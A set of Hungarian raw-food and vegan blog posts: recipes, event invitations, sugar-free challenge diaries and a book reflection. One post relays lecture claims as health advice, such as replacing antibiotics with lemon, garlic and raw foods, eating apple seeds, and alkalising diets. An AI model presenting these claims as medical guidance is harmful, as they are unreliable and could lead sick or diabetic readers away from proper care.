Emmának hozott a nyuszi egy műanyag tojást ami összecsukható, átlátszó formában ( csomagolásban) volt. Az az ötletem támadt, ha már csupa csoki minden a konyhában, ezt a formát is bekenem, hátha sikerül házilag is szép csokitojást készíteni. Ecsettel 2 szer bekentem a forma belsejét, majd amikor megszilárdult a csoki, tölteléket kerestem. Kéznél volt egy banán és maradt sárgabarack így ez került a tojásba. Csokitojás: Csoki: kakaóvaj vagy kókuszolaj, esetleg vegyesen kakaópor édesítő, xilit, méz vagy stévia... Vízgőz felett mindent összeolvasztunk. Ecset segítségével a forma belsejét kétszer kikenjük csokival. Részletes leírás a nyers csoki készítéséről Gittánál találhattok. Töltelék: banán citromlé méz útifűmaghéj sárgabarack A banánt villával összenyomjuk, hozzákeverünk 2 kiskanál citromlevet, 2 kiskanál mézet, és 2 kiskanál útifűmaghéjat. Ezt a formába töltjük egyik felébe egy sárgabarackot is teszünk. Amikor ez kész a még folyékony csokoládéval körbekenjük a tojás széleit, majd összecsukjuk a formát. Így pihent a hűtőben néhány órát, majd kivettük a formából a kiálló részeket késsel levágtuk és megettük... A forma összecsukva
Töltött csokitojás / Raw Easter Egg /
Íme a ma esti desszert. Sikeres kis tojásokat készítettem, azt hiszem főleg a gyerekeknek jött be, imádták a fanyar málna ízét a kellemesen édes kesukrémmel és csokoládéval... Töltött csokitojás: Csoki: kakaópor, kakaóvaj vagy kókuszolaj, méz vagy egyéb édesítő Töltelék: málna aszalt sárgabarack Kesukrém: 100 gramm kesudió beáztatva méz víz fél citrom leve késhegynyi vanília Mindent turmixolunk, amíg krémes állagot kapunk. A csokit összeolvasztjuk , elkeverjük. Lufikat fújunk fel csak picire, és ezeket belemártjuk a csokiba, majd tálcára tesszük. Érdemes többször is belemártani, így vastagabb lesz a csokiréteg a lufin. Hagyjuk megdermedni, esetleg hűtőbe is tehetjük. A lufikat kiszúrjuk és kiemeljük a csokiból. A csokiformák aljába 2-3 szem málnát teszünk, ráöntjük a kesukrémet és ráhelyezünk egy aszalt sárgabarackot. Kész a csoda tojás. Hűtőben pár napig eláll... Csokiba mártott lufikMegjött a nyuszi:)
40 prédikátor
Ez a címe annak a könyvnek, amiről már jóval régebben hallottam még a Solán talán vallástörténetből. A múlt héten a kezembe akadt, és úgy döntöttem elolvasom. Nem könnyed olvasmány, ennek ellenére nagyon le tud kötni. Egy 77 éves prédikátor emlékszik vissza arra, hogy az 1600-as években milyen üldöztetéseket kellett kiállnia a protestánsoknak. Mai fejjel nehéz felfogni, hogy mik történtek, csak azért, mert valaki másképp hitt valamit, mint a másik. Hiszen viszonylagos szabadságod van, törvényes keretek között azt csinálsz amit akarsz. Bár, ha belegondolunk, az utóbbi évben megingott ez a biztos alap is, köszönhetően az új egyházügyi törvénynek. De ezt most hagyjuk, nem kívánok politizálni.A lényeg az, hogy az állam és a vallás összekeveredése sosem vezet jóra. Egyrészt felhígul az adott egyház, mert sokan érdekből fogják követni, másrészt célt téveszt, és sokan megsínylik. Mégis, az egészből nem ezt tartom a leglényegesebbnek, hanem azt, hogy én hogyan viselkednénk egy ilyen helyzetben? Prédikátorként valószínűleg az első héten feladtam volna, pedig elég szigorú elveim vannak. Szomorú belegondolni, de az ember általában veri a mellét, mint Péter, hogy a többiek lehet, de én nem... aztán 3x is beleesünk a csapdába, ami után szemlesütve kulloghatunk. És a másik oldal? Mi van, ha épp a kellemesebb oldalon vagyok? Lennék-e ennek ellenére könyörületes, és irgalmas szívű? Vagy meggyőződve a saját igazamról tennék nagy ívben az elnyomottra? Oh, persze az ember mindig a legjobbat hiszi magáról, és oly sokszor kiderül, hogy gerendát hordoz a szemében. Mindez nem reklám szeretne lenni, talán már nem is kapható csak antikváriumokban a könyv, viszont fenn van a neten is, bár én így nem szeretek huzamosabban olvasni. Azért írtam le, mert komolyan elgondolkodtatott arról, hogy valójában mi lakik bennem, kényszerhelyzetekben ugyan hogyan viselkednék egyik, vagy másik oldalon. Szeretném hinni, hogy mindenütt megállnám a helyem, mégis ijesztő belegondolni az ellenkezőjébe...
Ananászos csokitorta
Kedvenceim azok a nyers torták amelyek sok-sok gyümölccsel készülnek, így ellensúlyozzák a magos alap töménységét. Az ananász, csokival szerintem igazán jó páros, és az ananász már magában is olyan ízletes , édes, zamatos, hogy egyéb ízesítőt nem igényel. Igazán finom lett... Ananászos csokitorta Alap: 100 gramm kesudió 100 gramm mandula 15- 20 db datolya 50 gramm kókuszreszelék 50 gramm zabpehely kiskanál fahéj reszelt citromhéj ( 2 citromé) ha nem elég édes, méz Hozzávalókat konyhai robotgépben eldolgozzuk,megkóstoljuk, ha nem elég édes mehet hozzá méz, majd kicsi csatos tortaformába nyomkodjuk. Ananászos réteg: 1 ananász 3 evőkanál útifűmaghéj 1 ananász felkockázva, konyhai robotgépben kicsit aprítva. hozzákeverjük az útifűmaghéjat és mehet az alapra. Csokikrém: 2 avokádó 1 banán 5 evőkanál kókusztej ( elhagyható) 2 evőkanál kókuszolaj 4 evőkanál kakaópor 6 evőkanál méz késhegynyi fahéj késhegynyi vanília A hozzávalókat konyhai robotgépben krémesre keverjük, majd a tortára kenjük. A tortát kókusz chipssel díszítjük. A tányér aljára kókusztejet is tehetünk.
Káposztás lepény (vegán)
2012. április 2. Dulmina tündérkonyhája
Annyira bejött a dagasztás nélküli pizzatészta, hogy máris ismétlés volt belőle. Igaz, ezúttal nem paradicsomos szósz került rá, hanem fűszeres párolt káposzta. Finom, laktató étel lett így a télről maradt utolsó fej káposztából. Hozzávalók 4-6 személyre 1 adag pizzatészta GoodFood módra a feltéthez: 1 kis-közepes fej (1/2-3/4 kg) káposzta 2 evőkanál olaj 1 dl (félédes) fehérbor (vagy víz) 1-
Egzotikus müzliszelet
2012. március 30. Nyers konyha
Egzotikus müzliszelet: 200 gramm zabpehely ( elhagyható ) 200 gramm napraforgó ( áztatva minimum 1 éjszakát) 200 gramm mandula ( áztatva minimum 1 éjszakát) 200 gramm mazsola ( áztatva 1 éjszakát) 200 gramm sárgabarack ( áztatva 1 éjszakát) 100 gramm szezámmag 3 banán 3 alma 1 ananász 1 evőkanál fahéj csipet só A beáztatott magokat lecsepegtetjük, aprítógépben daraboljuk. Kiöntjük egy tálba. Az aprítógépbe beleöntjük a lecsepegtetett mazsolát, banánokat, összevágott almákat és az ananász felét felkockázva. Jól eldolgozzuk, úgy hogy pépes állagot kapjunk. Hozzákeverjük a sót és a fahéjat. Ha ez kész ráöntjük az aprított magokra. A maradék ananászt és a sárgabarackot apró kockákra vágjuk, kinek mi a szimpatikus, fél vagy egy centis darabokra. Hozzákeverjük az egész masszához, majd a végén a zabpelyhet és a szezámmagot is beledolgozzuk. Ilyenkor meg lehet kóstolni, mennyire édes. Aszalás után még édesebb lesz, mert koncentrálódik benne a gyümölcscukor. Ha kívánatos lehet édesíteni mézzel, bár én nem szoktam. Kész a tészta, de ha van otthon érdemes még hozzákeverni, aszalt meggyet esetleg áfonyát, mazsolát. Mivel gyerekeknek is készül ezért ötletes formákat is adhatunk a müzlinek. Nagyon egyszerű és gyors például fagylaltos kanállal kis halmokat készíteni belőle. Fánkszaggatóba nyomkodva, kerek korongokat kapunk. A hagyományos müzliszelet alakot úgy lehet készíteni, hogy a masszát eloszlatjuk az aszaló tálcáján, a tapadásmentes lapon. Ha ez nincs akkor egy tepsin, ami ki van bélelve sütőpapírral. Kb. 1 centiméter vastagon kell elkenni a masszát és mehet az aszalóba. 40 fokra, vagy a sütőbe, hasonló hőmérsékletre. Kissé kinyitva a sütő ajtaját nem melegszik be annyira, így nem sérülnek az enzimek és vitaminok. Aszalás közben érdemes egyszer megfordítani, hogy mindkét oldala kiszáradjon. Éles késsel felszeleteljük. Aszalási ideje, kb. 12 óra, ha jól megaszaljuk akkor hűvös helyen légmentesen elcsomagolva 1 hónapig is simán eláll.
Gabona Mics Karfiol Pürével
2012. március 26. Fittanyuka Blog
Aki nem járt Erdélyben, talán nem ismeri Mics-t, amely egy balkáni eredetű étel, hasonló, mint a csevap. Mondanom sem kel, hogy nem húsmentes az eredeti recept amit most vegánosítottam. Nagyon finom, a fűszerek adják meg az eredeti hússal készült receptnek is az ízét! Gabona Mics A hétköznapokban nagyon szeretem használni, mivel, gyors, praktikus, egészséges megoldás a különböző gabona-zöldség fasírtporok. A legjobb választás szerintem a Natura fasírtporok, sokfélék és rendkívül olcsók! Elkészíthetjük házilag is a keveréket, amelyet nyers zöldségekkel dobunk fel. Hozzávalók: 50g Barna rizsliszt 50 g szezám pehely 50 g lenmagpehely 50 g zabpehely 25 g vegamix ( szárított zöldség keverék) 1 evőkanálnyi napraforgó mag 1 evőkanál édes őrölt piros paprika 1 kávéskanálnyi himalaya só 1 db reszelt répa 2 cikk fokhagyma 1/2 fej vöröshagyma reszelve késhegynyi őrölt zöld bors Kókusz olaj a sütéshez. A nyers hozzávalók kivételével az alapanyagokat összekeverjük egy keverő tálban, majd hozzáöntünk 250 ml meleg vizet, összekeverjük és fél órát pihentetjük, hogy a pelyhek a nedvességet magukba szívják. Utána az apróra reszelt répát, hagymát is hozzáadjuk, összekeverjük és vizes kézzel tetszőleges henger alakú fasírtokat formázunk és felmelegített kókusz olajon elő sütjük. Minden oldalukat pirosra sütjük. Egy tepsire kiszedjük és előmelegített sütőben 180 C fokon még 15 percig sütjük, hogy a közepe is biztosan átsüljön. Melegen-hidegen kitűnő! Karfiol püré: 1 db közepes fej karfiol 1-2 db közepes krumpli 200 ml növényi tejszín 1/2 citrom leve 1/2 kávéskanál himalaya só friss petrezselyem zöldje 1-2 db babérlevél A karfiolt rózsáira szedjük, a krumplit tisztítás után felkockázzuk és a sóval, babérlevéllel egy ujjnyi vízben lefedve puhára pároljuk, ( vizet leöntjük róla, babérlevelet kivesszük) majd a növényi tejszínnel, citrom lével krémesre turmixoljuk. A felaprított petrezselyem zölddel megszórjuk. Friss salátával, zöldségekkel tálaljuk! Fittanyuka - Lúgosító ételek a facebookon A gabonás zöldség étel mellé nem a keményítőben gazdag krumpli illik élettani szempontból, hanem a semleges züldségből készült ( karfiol), püré.Fittanyuka
Könnyed tavaszi ebéd
2012. március 21. Főzés nélkül finoman!
Sokan panaszkodnak, hogy a főzés milyen sok időt elvesz az életükből, a konyha rabjainak érzik magukat, a családjukkal, barátjukkal tölthető idő lerövidül, kevesebbet tudnak így magukkal foglalkozni - széles mosollyal nézek ilyenkor ki a fejemből, hiszen, egy főzés nélkül finoman beszélgetés közepén vagyunk éppen - és hogy milyen sok macerával jár... Nos, akkor szeretnék megosztani veletek, egy gyorsan, kevés alapanyagból elkészíthető 10 perces receptet, amelyet mégis élvezettel, hosszú percekig lehet falatozni. Sárgarépát, zellert, karfiolt, kaliforniai paprikát, édes káposztát tisztítok, majd megfelezem az alapanyagokat - a mennyiségnél, ugyan úgy, mint a recepten történő bármely változtatásnál legyetek bátrak és kreatívak - az egyik fele kerül a darálómba, kevés tisztított víz - segít a pépesítésben -, olíva olaj, medvehagyma - ilyenkor, nem tudok eleget fogyasztani belőle, akár kiváló vértisztító hatása miatt, én egyszerűen szeretem - majoránna és só társaságában. Amíg a darálom dolgozik a zöldségek másik felét szeletelem, aprítom, rukkolát keverek hozzá, kevés olíva olaj itt is elfér. Olívás kenyér pirul, tányérra helyezem és megszórom egy kissé megtört lenmaggal - így könnyebben emészthető - a pástétom elkészült, ebből is szedek magamnak. Hmm... Igazán szép lett és garantálom finom is. Legyen csodásan szép napotok, élvezzétek az Életet és ezt a finomságot! Javed
Gyümölcssaláta
Hogy az egész családot ledöntötte a lábáról a betegség, raktam össze nagy adag gyümölcssalátát, hogy a vitaminkészleteinket feltöltsük. Egy gyümölcs saláta alap összetevői a mi olvasatunkban: 2 rész alma 1 rész narancs 1 rész banán 2/3 rész kivi Kiegészíthető ízlésünktől, pénztárcánktól és a kamrapolctól függően: ananásszal (mint jelenleg), mangóval, csillaggyümölccsel, stb. Az epret csak díszítőelemnek javaslom, mert nagyon összetörik. Amikor mindezeket apróra vágtuk, és összeráztuk, egy kanál mézet némi citromlével és vízzel összekeverhetünk, és ráönthetjük a salátára. Ez az öntet kihozza a gyümölcsök ízét, és minél hamarabb öntjük rá, annál kevésbé barnulnak meg az összetevők. A mézet el is hagyhatjuk a gyümölcsök édességétől függően.
Programajánló :)
2012. március 17. Nyers konyha
Budapest, Budapest te csodás..... :) Lesz egy klassz program a kőbányai Kőrösi Csoma Sándor Kulturális központban március 25-én vasárnap ,,EGÉSZSÉG ÉS ÉLETIDŐ Tavaszi Családi és Egészségnap címmel ! Én nem hagynám ki! A teljes program a Kőrösi honlapján Ha érdekel a nyers étkezés, de még csak hallottál róla, akkor ott a helyed, hogy végre közelebbről is találkozzatok! Ha már egy ideje kóstolgatod a nyers fogásokat, akkor is ott a helyed, hogy még többet tudj meg erről az életformáról. Az 1-es teremben olyan kiállítók lesznek, akik valamilyen formában kapcsolódnak a nyers ételekhez, a nyers életmódhoz. Lesznek könyvek, alapanyagok, biobolt, biokertész, kész nyersételek, profi edények, eszközök, csírák, búzafű, élő lekvár, stb. Megkóstolhatod a Nyersétel Akadémia termékeit, italokat, édességeket. Készítünk együtt nyers tortát, és valamilyen nyers főételt, sok sok italt. Előadást tart Nagy László Zoltán, az amerikai Hipokratész intézet életmód tanácsadója. Rá nagyon sokan kíváncsiak, legutóbb, a Zöldturmix fesztiválon is óriási sikere volt. Most nem az 1-es teremben, hanem a színházteremben hallgathatjuk meg őt délután 16 órától. Gyere el, nagy szeretettel várunk téged is!
Március 24 - Meghívó: Tavasz ihlette nyers vegán ínyenc vacsora/ Invitation: Spring kissed raw vegan gourmet dinner
Március 24. (szombat/saturday) 19.00 Tavasz ihlette vacsora: bimbózó ízek és illatok / Spring kissed dinner : budding flavours and scents Új: Exkluzív helyszínen pesten! / New: Exclusive venue on the Pest side ! Menü / Menu: #yiv477786532 filtered { font-family: Arial; }#yiv477786532 filtered { font-family: Cambria; }#yiv477786532 p.yiv477786532MsoNormal, #yiv477786532 li.yiv477786532MsoNormal, #yiv477786532 div.yiv477786532MsoNormal { margin: 0cm 0cm 10pt; font-size: 12pt; font-family: Times New Roman; }#yiv477786532 span.yiv477786532hps { }#yiv477786532 div.yiv477786532Section1 { } Mentás édeskömény és retek saláta / Fennel and radish salad with mint Tavaszi erőleves / Spring broth Medvehagymás gombás pite / Wood garlic and mushroom pie Szilva-ravioli fahéjkrémmel / Plum ravioli with cinnamon cream Petit fours Információ: www.eletkonyha.hu Várunk szeretettel! Jelentkezz! / We are looking forward to see you on our dinners. Book your seat!
"Ha nem akarsz cukorbeteg lenni, étkezz úgy, mint egy cukorbeteg."
Tegnap ismét okosabb lettem a cukorbetegség, az édesítőszerek, a szervezet működése, gyógyítása témakörben. Az előadás igen alaposan járta körbe a témát. Nem lehet erről így - blogon, írásban, - teljes tájékoztatást adni, de néhány dolgot sikerült lejegyzetelnem, amiből szemezgetve most mások okosodását elősegítve megosztok mindenkivel: Már én is említettem egyik bejegyzésemben az alma jótékony hatását. Most még teljesebb képet kaptam arról, hogy mennyire nagyszerű az emberi szervezet számára az egész gyümölcs. Az előadó az alma magjait és magházát is ajánlotta fogyasztásra - nem csak cukorbetegek számára. Persze mértékkel, hiszen ez a mag is ciánt tartalmaz. De nyilván ahhoz rengeteg almamagot kellene elfogyasztani, hogy a cián kifejtse kártékony hatását. Tóth Gábor beszélt a cukor hatásairól. Hiába növényi táplálék, a cukor mégis a következő negatív hatásokat fejti ki szervezetünkben:Károsítja: - szív és érrendszert - szemet - fogazatot - emésztőszervek felszínét - hasnyálmirigyet - idegrendszert - kiválasztó szerveket (máj, vese) - egyes belső elválasztású mirigyeket Gombásodás révén károsodhatnak: - nemi - és urológiai szervek - bőr Fő okozója a következőknek: - elhízás - szellemi tompaság - ingerlékenység - kedvtelenség - rossz közérzet Cukorbetegségben szenvedők számára az alábbi megoldásokat ajánlotta: - Rostban gazdag étrend bevezetése (elsősorban zöldségek és gabonafélék) - Összetett szénhidrátok fogyasztása (kevésbé édes ízek) - Protektív anyagok beviteléről gondoskodni - vitaminok, ásványi anyagok által, hogy a hiányállapotokat elkerüljük. (Ajánlott különböző magvakat gabonákkal párosítva) - Lúgosítás (elkerülhető a savak, az elhízás és az édességvágy) - Candidiasis-t megelőző étrend - Lelki stabilitás (pótcselekvések - pl. nassolás - megelőzése) Az előadó, Tóth Gábor beszélt a mesterséges édesítőszerek káros hatásairól - fejfájás, ingerültség, hasmenés. Nem csak az aszpartamot említette meg. Továbbá felhívta a jelenlévők figyelmét arra, hogy a "csipszadó" - ami ma már inkább "lekváradó", pont arra ösztönzi a gyártókat, hogy cukor helyett mesterséges édesítőszereket használjanak.Érdemes odafigyelni, hogy mit (v)eszünk és mit iszunk....Ezeket hallva, olvasva mindenkiben felmerül a kérdés, na jó, de akkorHOGYAN ÉDESÍTSÜNK?Természetes édesítőszerekként az alábbi javaslatok kerültek felsorolásra: - Mézek (elsősorban a jobb minőségű - és sajnos drágább mézeket ajánlotta, nem a virágmézet, persze felhívta a figyelmet arra, hogy a méz kevésbé ajánlott cukorbetegek számára - az előadáson nem csak a cukorbetegek "kezeléséről", hanem megelőzéséről is szó volt) - Aszalványok, gyümölcskoncentrátumok - Gyümölcscukor (fruktóz) - Nyírfacukor (xilit, xilitol) - Alternatív szirupok (tápióka, agavé, juhar, árpamaláta, kukorica, rizs, stb) - (Zárójelben megjegyezte a cukoralkoholokat: szorbit, mannit, maltit) Beszélt a II. típusú cukorbetegség okairól, a következő tényezőket felsorolva: - Genetika (kb. 30%-ban felel érte) - Életmód, környezet, egyéb (70%-ban) - Étrendi okok között az alábbiakat említette: - Zsiradék és szénhidrát dús étrend - Egyszeri, nagy mennyiségű étkezések - Esti nagy vacsorák - Rosthiányos, finomított élelmiszerek - Szabályozóanyagok relatív hiánya - Közvetett ok: elhízáshoz vezető étrend Az előadó megosztotta velünk a főbb téves nézeteket a cukorbetegséggel kapcsolatban: - Egyszerű cukorforrások teljes megvonása - Szénhidrátmentes élelmiszerek növelése - Tej, tejtermék, tojás és húsfélék fogyasztása Cukorbetegség egyéb következményeit is a hallgatóság elé tárta: - Immunitás gyengülése - Bélrendszeri státusz előnytelen változásai - Elsavasodási folyamat fokozódása - Kiválasztó szervek terhelődése Ezek után mindenki feltenné a kérdést, tulajdonképpen HOGYAN ÉTKEZZÜNK? - Cukor, állati zsír kiiktatandó - Sófogyasztás jelentős csökkentése - Állati fehérjék kiváltása növényi proteinekkel - Kevés növényi olaj használata (Ahogy korábban már én is írtam, lassítja a gyomor ürülést, normalizálja a vércukorszintet, ha nélküle főzünk) - Főzési praktikák pl. rántás csökkentése, ill. helyettesítése zabpehely-, köles-, szója-, vagy sárgaborsó liszttel - Búzacsíra, zabkorpa, lenmag, pektin források hasznosak - Zöldturmix és nyers táplálkozás Rengeteg sok jó és hasznos dolog hangzott el, a töredékét tudom csak visszaadni. A tudományos rész mellett igyekeztem néhány érdekességet is lejegyzetelni.Cukorbetegeknek ajánlott a különböző gombákból készült italok fogyasztása - mint pl. shii-take gomba, de ugyanígy ajánlotta az aloe-verából készült leveket is.Ha cukrászsüteményt eszünk, akkor a felszívódást lassíthatja, ha a sütemény után egy kanál korpát is fogyasztunk.Aki többet eszik, többet verejtékezik.Megtudhattuk, hogy az igazi Kellog-féle műzli valójában az alábbi összetevőket kell(ene), hogy tartalmazza: - gabona(pehely) - aszalványok - gyümölcs - magok Szó volt arról is, hogy már egészen csecsemő kortól tudatosan érdemes a szülőknek arra figyelni, hogy a gyermek édesség íz iránti vágyát folyamatosan nem kielégíteni, hanem féken tartani.Az édességfüggőség együtt jár viselkedésfüggőséggel is. Azok az emberek, akik nem tudják kordában tartani édesség iránti vágyukat, a viselkedésüket sem tudják megfelelően irányítani."Ha nem akarsz cukorbeteg lenni, étkezz úgy, mint egy cukorbeteg"."Cukorbetegek számára a legajánlatosabb gyümölcsök: alma, meggy, szilva.""Nyers ételek hatására a szervezet magához tér, a folyamat kézben tarthatóvá válik, javulás kezdődik.""Antibiotikum helyett fogyasszunk sok citromot, fokhagymát, hagymát, tormát, nyers ételeket és csírákat."Felét sem sikerült visszaadnom mindannak, ami elhangzott, de remélem sokak számára hasznos információt tartalmaz, és felkelti az érdeklődést a következő előadáson való részvételre. Mielőtt bárki az első követ rám dobná, tisztában vagyok vele, hogy nem minden receptemben valósítom meg a fent vázolt tudást. De aki ezen az úton halad, az pontosan tudja, hogy az ember fokozatosan tudja bevezetni az életébe és étrendjébe a tudás gyakorlati alkalmazását.
Kelet-Nyugat fúziója képekben/East-west fusion in pictures
....avagy nyers vegán gourmet vacsoránk képes beszámolója/ alias pictures from our raw vegan gourmet dinners... Tárkonyos citrus saláta /Citrus salad with tarragon Tárkonyos citrus saláta /Citrus salad with tarragon Édesköményleves korianderes tök chips-szel/ Fennel soup with coriander pumpkin chips Fűszeres mogyorós tészta lime-mal és gyömbérrel/ Spicy peanut noodles with lime and ginger Sütőtökös tiramisu/ Pumpkin tiramisu Sütőtökös tiramisu/ Pumpkin tiramisu Kakukkfüves marcipán csokoládé-papírban és idézetet rejtő szerencsesüti/Thyme marcipan in chocolate paper and fortune cookie
Szuper reggeli: citromos-mákos kókusztejes bulgur
2012. március 10. Zizi kalandjai
Folytatódik a szuper reggeli sorozat! Ebbe már került egy kis édesítő, de tényleg minimális. Szuper finom, könnyű elkészíteni, tápláló, laktató, különleges, nem mindennapi reggeli. Igen, jól olvastátok a címben, bulgurt használtam az elkészítéséhez. A bulgurt eddig köretként, sós ételek készítéséhez használtam fel. Heidi Super Natural Every Day című szakácskönyvének köszönhetően megtanultam, hogy nemcsak ebéd vagy vacsora készülhet ebből a gabonából (tört búza), hanem reggeli is. Krémes kókusztejben és vízben főztem meg, egy kevés mézzel édesítettem és belekerült a mák és a citrom kiváló párosa is. Citromos-mákos kókusztejes bulgur Hozzávalók 2 főre: - 180 ml kókusztej - 120 ml víz - 70 g bulgur - 1 teáskanál mák - 1/2 bio citrom reszelt héja - 4 teáskanál méz - 1/4 teáskanál só - 15 g szeletelt, pirított mandula Száraz serpenyőben 5-7 perc alatt pirítsuk meg a szeletelt mandulát, majd tegyük félre. Egy lábasban melegítsük fel a kókusztejet és a vizet, majd keverjük bele a bulgurt és forraljuk fel. Ekkor vegyük takarékra a lángot és főzzük 15-20 percig, amíg a bulgur megpuhul és magába szívja a folyadékot. Keverjük bele a mézet, a mákot és a citromhéjat. Ha szükséges adjunk még hozzá egy kevés vizet vagy kókusztejet, hogy krémes maradjon az állaga. Tálaljuk melegen, szórjuk meg még egy kevés citromhéjjal és a pirított mandulával.
Szuper reggeli: Zabpehely rizstejjel és pirított mandulával + a negyedik hét cukor nélkül
2012. február 29. Zizi kalandjai
Hát ide is eljutottunk... a végére! A cím nem teljesen pontos, ugyanis a negyedik hetet csak félig csináltuk végig. Február 25-én a délelőtti órákban, 25 kemény nap után véget ért a kihívás. A 24. napon este rám tört az édesség utáni vágy elég erősen, ezért úgy döntöttem, hogy másnap megállítom a folyamatot és nem kínzom magam tovább. Befejeztük. Elég volt most ennyi. A böjt ezzel lett megtörve... habos cappuccinoval és egy alig érezhetően édes croissant-nal. Elfogyasztásuknak minden pillanatát élveztük I.-vel. Néhány hónapja szokásunkká vált, hogy a szombati piac után megiszunk egy pöti káfét vagy cappuccinot és eszünk hozzá egy croissant-t. Múlt szombaton úgy döntöttünk, hogy teszteljük a Villa Bagatelle kistesóját, a Bagatellinit. Rengeteg ropogós, finom kenyér, pékáru, szendvics, saláta, frissen facsart narancslé készül náluk, mi azonban maradtunk a hőn áhított egyszerű reggelinknél. A cukormentesség feloldására kiváló volt. A Bagatellinivel egy olyan kávézót és pékséget hoztak létre, ahol minden elsőrangú minőségű, természetes vagy bio alapanyagokból készül, és amelyben a kávékülönlegességekről a kiváló minőségéről ismert, bécsi Daniel Moser gondoskodik. A legapróbb részletekre is figyeltek a design kialakítása során, egységes hangulatot tükröznek a fehér bútorok, a csodás fehér csempe a falon, a fehér színű kiszolgálópult és a fehér KitchenAid is. Rengeteg recept készült még a cukormentes vegán hónap alatt, ezeket folyamatosan megosztom majd veletek itt a blogon. Lesz külön bejegyzés az alternatív édesítőszerekről is. Most pedig a konklúzió... Megérte-e 25 napig teljesen cukor és édesség mentesen élni? A válaszom egyértelműen igen. Türelemre tanított, figyeltem a testem működését. Bármennyire is kívántam az édességet az mindig csak néhány pillanatig tartott, majd beleástam magam valamibe és már nem is hiányzott. Úgy éreztük mindketten, kellett a testünknek egy ilyen fajta tisztulás és egyelőre azt gondoljuk, hogy jövő februárban meg fogjuk ismételni. A cél az volt, hogy ezután kevesebb édeset együnk. Reméljük ezt sikerül megtartanunk. Ha túl sok lesz az édesség recept a blogon, nyugodtan szóljatok rám. Íme egy cukormentes, gyors, könnyen elkészíthető reggeli recept, amely tápláló és még a hétköznapi reggeli rohanásba is belefér az elkészítése és az elfogyasztása. A rizstej édeskés íze miatt egyáltalán nem szükséges édesíteni. Ha mégsem férünk a bőrünkbe, adjunk hozzá 2 teáskanál mézet. Zabpehely rizstejjel és pirított mandulával Hozzávalók 2 főre: - 10 evőkanál zabpehely - 400 ml rizstej (natúr, édesítetlen) - 1 kis marék mandula - fahéj A mandulát száraz serpenyőben 6-8 perc alatt pirítsuk meg. Ha kihűlt aprítsuk durvára. A rizstejet langyosítsuk fel egy lábasban. Osszuk el egyenlően a zabpelyhet tálkákban, öntsük rájuk a rizstejet, szórjuk meg fahéjjal, majd a pirított mandulával. További cukormentes vegán receptekért katt ide.
Édes céklasali
2012. február 27. Nyers konyha
Egy jól sikerült salátámat osztanám meg veletek. Igazi téli saláta, mely segíti testünk méregtelenítését. Bizony itt a tavasz a böjti időszak, érdemes már tisztogatni testünket- lelkünket. Hétvégén tartottam egy rövidebb léböjtöt, ismét a NEERA kúrát választottam. Nekem tökéletesen bevált, semmi korgó gyomor vagy egyéb kellemetlenség, ha bejön a melegebb idő ismét belekezdek egy kicsit hosszabb lélegzetűbe. Képzeljétek járok jógázni:) Annyira örülök ennek, már réges-rég óta vágytam rá, és most már úgy 2 hónapja járok heti 2x. Imádom:) Ja igen most ünneplem, hogy 2 éve leálltam a húsfogyasztással. Érdekes, annyira nem hiányzott 1 percig sem! Sőt azt nem értem, miért nem hagytam el hamarabb.... Édes céklasali: 1 cékla 1 alma 2-3 evőkanál inaktív sörélesztő pehely 1 evőkanál szezámmag Céklát és almát lereszeljük, fele- fele arányban. Egy tálban összekeverjük szezámmaggal és sörélesztő pehellyel. Csírákkal, salátával és nyers kenyérrel fogyasztottam.
Kesudió krémsajt + a harmadik hét cukor nélkül
2012. február 25. Zizi kalandjai
A kihívás harmadik hete jól telt, néha vágyakoztunk édesség után, de azért tudtuk tartani magunkat. I. maradt vegetáriánus, én azonban a cukormentesség mellé bevállaltam a vegán étkezést is. Vegetáriánusból vegánba átlépni nem nehéz, csak arra kellett figyelnem, hogy ha veszek valamit, akkor alaposan elolvassam az összetevőket, hogy nincs-e benne állati eredetű élelmiszer. Igen, ennyire keményen tartom a diétát, igyekszem odafigyelni ezekre az apróságokra is. Bevallom még a növényi sajtra is rávetemedtem... vegán barátaim javasolták, hogy próbáljak ki egy görög fajtát, ami állítólag (végre) jó ízű is, magában is fogyasztható és jól lehet reszelni is. A natúr ízű Viofast sajtot próbáltam ki. Ízre tényleg OK (magában és ételekre reszelve, olvasztva is), ami egy kicsit zavart, az az összetevőkben lévő E1450, E1404 és E452. Utánanéztem, hogy mit is ettem pontosan. Az E1450 keményítő-nátrium-oktenil-szukcinát (ajaj!), ami állítólag veszélytelen; bekerül a szénhidrát anyagcserénkbe. Az E1404 oxidált keményítő, szintén ugyanaz vonatkozik rá, mint az E1450-re. Az E452 pedig egy polifoszfát fajta, szintén veszélytelennek számít és ömlesztett sajtok (+ készítményei), húskészítmények, desszertek és fagylalt készítéséhez is felhasználják. (Köszönet az infókért a Tudatos Vásárlónak.) Szinte hihetetlen, hogy ezekből az anyagokból sajtok és egyéb élelmiszerek készülnek. Nincs benne tej (tehén- vagy kecsketej), mégis sajtnak van eladva és sajtként fogyasztja az ember... Elgondolkodtató! A fotón látható krémsajt azonban csak természetes anyagokból készült. Felhasználhatjuk szendvicsek készítéséhez vagy kenhetjük pirított kenyérkockákra, krékerre, de akár zöldségeket - répát, paprikát, uborkát, stb. - is mártogathatunk bele. Gyorsan készen van, a kesudió áztatását leszámítva, csak egy erős aprítógépre van szükségünk az elkészítéséhez. A recept megint Maria-tól származik, akinek a blogja sokat segít a cukormentes hónap alatt. Rengeteg vegán, cukormentes receptje van és inspiráló bejegyzései, amelyek tartják bennem a lelket! :) Kesudió krémsajt Hozzávalók: - 250 g kesudió, beáztatva egy éjszakára, majd lecsöpögtetve - 100 ml rizstej (zabtej, szójatej is használható helyette) - 1 db citrom reszelt héja - 1/2 citrom kifacsart leve - 1 teáskanál köménymag, száraz serpenyőben 4-5 perc alatt megpirítva - 1-2 teáskanál só - bors Tegyük az összes hozzávalót az aprítógépbe és aprítsuk addig, amíg sima, krémes, kenhető állagú lesz. Kóstoljuk meg és ízlés szerint adjunk még hozzá citromlevet, sót, borsot, ha szükséges. További cukormentes vegán receptekért katt ide.
Zöldséges batyu
